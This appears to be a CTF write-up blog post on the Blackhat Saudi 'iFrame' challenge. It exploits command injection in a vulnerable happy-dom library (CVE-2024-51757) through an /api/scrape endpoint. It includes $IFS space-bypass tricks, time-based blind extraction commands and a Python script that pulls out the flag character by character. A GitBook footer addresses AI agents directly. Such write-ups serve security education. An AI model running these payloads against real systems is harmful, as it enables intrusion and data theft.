> For the complete documentation index, see [llms.txt](https://samfisher91.gitbook.io/samfisher-blog/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://samfisher91.gitbook.io/samfisher-blog/blackhat-saudi-less-than-web-greater-than-iframe.md). # Blackhat - Saudi \ iFrame ## Understand the objective After unziping the compressed file below what will you get
well we know now the flag can be obtained by that C file which is should be compiled to executable
as we can see run.sh will compile the flag.c using gcc and put it in root of machine "/"
Dockerfile will do all the necessary steps to build the machine and at the end it will execute the run script for the flag ,so currently we have a clue that we need RCE to get the flag. ### Find the RCE + Exploit it now we have a task to find the RCE to get that flag ,so we do some source code review trying to find any possible way to get RCE ,and i found that in the **package.json** file which it uses happy-dom library vulnerable version
googling that library for a cve will give you tons of results for a new CVE 2024

CVE-2024-51757

#### Exploit the RCE to apply this to our current CTF scenario require a bit modifications to suite how the request are being handled ,reviewing the index.js file :-
clearly the /api/scrape endpoint what is interesting us here . what we understand that In this POST endpoint, the data is sent in JSON format. The key used to send the HTML content is html. The value of this key should be a string that contains the HTML of a webpage. the html key contain the entire HTML content of the page which it should include , tags then meta tag has name & content ,tag is specifically needed to extract the description . example of executing valid and wrong post data request as per the code with the help of chatgpt he can give you example accepted html code to be passed as a key value.

Valid request

invalid request

we can inject our payload in the body tag i tried to just execute single command which is "ps"
as you can see 1- which is the payload we execute reflecting in the server debugger , 2- we can observe and monitor the command being execute in the system processes. thats mean our RCE is successfully executed ,lets try to create a new file in /tmp folder
as we can see the server receiving the request and encode it to URL ,then pass it to system trying to execute it ,but you cant execute commands containing url encode ,we can use IFS as input field Seperator that could be handled well by the shell ,read below for more information about IFS. {% embed url="" %} now we replace the space with $IFS
#### Blind Data exfiltration now time to exfiltrate the data via the command injection ,but we are doing that blindly ,so first lets find the correct command piping it via sleep time to confirm the correct letter of each offset ``` if [[ $(whoami | cut -c 1) == "r" ]]; then sleep 5; fi also we can do FLAG=$(/flag) && [ "$(expr substr $FLAG 1 1)" == "f" ] && sleep 5 /flag is the executable ``` combining these commands and big thanks to my collogue @**Zeenbleed** creating this script to exfiltrate data ``` import requests import base64 import time import string import urllib.parse def generate_payload(i): for ii in string.printable: payload = f"FLAG=$(/flag) && [ \"$(expr substr $FLAG {i} 1)\" == \"{ii}\" ] && sleep 2" encoded_payload = urllib.parse.quote(payload) yield encoded_payload,ii def send_request(payload): url = "http://localhost:5000/api/scrape" headers = {'Content-Type': 'application/json'} data = { "html": f"Test Page

Hello World

".replace('@@',payload) } start_time = time.time() try: response = requests.post(url, json=data, headers=headers, timeout=4) except requests.exceptions.ReadTimeout: pass end_time = time.time() response_time = end_time - start_time return response_time done = False for i in range(1, 100): for payload,char in generate_payload(i): done = False if done: break while not done: response_time = send_request(payload) if response_time < 3: done=True if response_time > 2: print(response_time,char) elif (response_time > 3): done=False ```
--- # Agent Instructions This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com. ## Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://samfisher91.gitbook.io/samfisher-blog/blackhat-saudi-less-than-web-greater-than-iframe.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.